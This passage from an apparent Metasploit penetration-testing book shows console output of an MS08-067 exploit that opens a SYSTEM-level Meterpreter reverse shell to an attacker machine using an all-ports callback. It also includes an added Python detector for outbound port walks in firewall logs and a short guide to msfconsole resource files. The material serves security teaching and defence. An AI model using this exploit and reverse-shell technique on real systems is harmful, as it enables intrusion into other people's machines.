Chapter 5

msf exploit(ms08_067_netapi) >
[*] Started reverse handler on 192.168.33.129:1
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:1 -> 192.168.33.130:1047)

msf exploit(ms08_067_netapi) > sessions -l -v

Active sessions
===============

  Id  Type         Information                         Connection                               Via
  --  ----         -----------                         ----------                               ---
  1   meterpreter  NT AUTHORITY\SYSTEM @ IHAZSECURITY  192.168.33.129:1 -> 192.168.33.130:1047  exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Notice that we do not set an LPORT; instead, we use allports because we are going to try to connect out of the network on each port until we find an open one. If you look closely at the output above, you will see that our attacker machine is bound to :1 (all ports) and that it finds a port outbound on port 1047 on the target network.
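
Seen from the defender's side, an outbound connection attempt on each port in turn leaves a distinctive trail in egress firewall logs. The following is an added example, not code from the book: it flags any internal host whose attempts toward one external address step through consecutive destination ports. The log format, the addresses, and the min_run and max_gap thresholds are assumptions constructed for the illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format (constructed for this example):
#   <ISO time> <ALLOW|DENY> TCP <src>:<sport> -> <dst>:<dport>
LINE = re.compile(r"^(\S+) (ALLOW|DENY) TCP (\S+):(\d+) -> (\S+):(\d+)$")

def parse(lines):
    """Yield (time, action, src, dst, dport) for each well-formed line."""
    for line in lines:
        m = LINE.match(line.strip())
        if m:
            ts, action, src, _sport, dst, dport = m.groups()
            yield datetime.fromisoformat(ts), action, src, dst, int(dport)

def find_port_walks(lines, min_run=5, max_gap=timedelta(seconds=5)):
    """Flag src->dst pairs whose attempts step through ports n, n+1, n+2, ..."""
    by_pair = defaultdict(list)
    for ts, action, src, dst, dport in parse(lines):
        by_pair[(src, dst)].append((ts, action, dport))
    findings = []
    for (src, dst), events in by_pair.items():
        events.sort(key=lambda e: e[0])
        best, run = [], []
        for ev in events:
            # Extend the run only if this attempt is the next port and close in time.
            if run and ev[2] == run[-1][2] + 1 and ev[0] - run[-1][0] <= max_gap:
                run = run + [ev]
            else:
                run = [ev]
            if len(run) > len(best):
                best = run
        if len(best) >= min_run:
            allowed = [port for _, action, port in best if action == "ALLOW"]
            findings.append({"src": src, "dst": dst,
                             "first_port": best[0][2], "last_port": best[-1][2],
                             # Port that got through egress filtering, if any.
                             "allowed_port": allowed[0] if allowed else None})
    return findings

# Constructed sample: one host walking ports 1-6 (6 is allowed), plus normal web traffic.
SAMPLE = (
    ["2024-05-01T10:00:00+00:00 ALLOW TCP 10.0.0.9:50100 -> 198.51.100.20:443"]
    + [f"2024-05-01T10:00:{p:02d}+00:00 {'ALLOW' if p == 6 else 'DENY'} "
       f"TCP 10.0.0.5:{49151 + p} -> 203.0.113.7:{p}" for p in range(1, 7)]
    + ["2024-05-01T10:00:09+00:00 ALLOW TCP 10.0.0.9:50101 -> 198.51.100.20:80"]
)

if __name__ == "__main__":
    for finding in find_port_walks(SAMPLE):
        print(finding)
```

A non-empty allowed_port in a finding marks the egress port that was left open, which is the rule to review first.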

Resource Files

Resource files are script files that automate commands within msfconsole. They contain a list of commands that are executed from msfconsole and run sequentially. Resource files can greatly reduce testing and development times, allowing you to automate many repetitive tasks, including exploitation.

Resource files can be loaded from msfconsole with the resource command, or they can be passed as a command-line argument with the -r switch.

The simple example shown next creates a resource file that displays our Metasploit version and then loads the sounds plug-in:

root@bt:/opt/framework3/msf3/ echo version > resource.rc
root@bt:/opt/framework3/msf3/ echo load sounds >> resource.rc
root@bt:/opt/framework3/msf3/ msfconsole -r resource.rc
resource (resource.rc)> version
Framework: 3.7.0-dev.12220
Console  : 3.7.0-dev.12220
resource (resource.rc)> load sounds
[*] Successfully loaded plugin: sounds
msf >

As you can see, the version and load sounds commands are echoed into a text file called resource.rc. This file is then passed to msfconsole at the command line with the -r switch, and when the file begins to load, the commands are executed from the resource file.